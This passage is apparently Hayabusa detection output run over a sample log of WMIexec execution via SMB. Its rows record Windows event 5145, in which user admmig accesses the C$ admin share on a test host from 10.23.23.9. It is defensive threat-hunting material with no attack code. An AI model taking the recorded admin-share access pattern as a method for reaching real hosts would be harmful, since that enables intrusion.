Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\433ad5082c48708eb6acf6fa065c1461 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P08ac43d5#\87b325b56b362a5d2dca93029c0d75b8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P9de5a786#\8078dc8e65f16bfd95c09cce4fe0280e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P10d01611#\54330dabd4f5e29c758461cbbf2a4f34 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.780 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P34f388c1#\50399e243bf8da1addc23305521efbd9 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P1706cafe#\174cd66357bfa0b262b0dbd9bd0e64e3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.795 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P047767ce#\f05e09fe4c0d9354867afe11b4e9db8c : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.811 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\89e812888a4e94f1d2bf0da1c4c6ee5b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P655586bb#\f3228ac51b37737ae2ce1176bbbad2ce : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P39041136#\cabc62ca2a04f99fe9af65799a727687 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\1617c5f47d154a5d7cf1f53851398006 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\19b334bb62b3c76cfcc7137bb03371c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pcd26229b#\822ee6a8aa9386352052b7bd2610f3b5 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pd3efef62#\ab00f4aa6892c4c6d39b87f078e8208f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pefb7a36b#\93b57911ae369118b40a5605c448eb9d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.R251a4777#\b090c87f42b1af785a6a9d1c43c201c6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.842 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S0f8e494c#\c59f97903ad4de423586f3a75eb8939d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S1bc92e04#\f6f9e39cc765b7ceda89fc7893e0f74c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S8ca2c749#\7ddbc8b883fb594b4efd9f4b016a4657 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S54faafb0#\54486a01e573ae88df2c9fc21771e5ef : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S356e1ba0#\29e4fb69d6e2ff119c3e89fe9f23ea71 : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.S88747207#\e998cb40c6a3657a6090a653616ee0d2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.873 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sa56e3556#\2da102d7caf13b4e082aabda839cabfd : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Sb6a1f1bc#\05a925477e72821ff9fa9527061d8527 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.T9d753d8c#\9543db50e278526c3ba397cf5c7862cb : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te49ad7d9#\1834f24e507a831c635b80067fc7a428 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Te3736ca4#\f98240dfe778b4b39045d17817485b8a : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ud0e65fb9#\bb434af0d1c0846eba8f3fc7986a5cdc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:31.906 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\b59fee046dfa048ec5f5180dc88f835d : IP Address: 
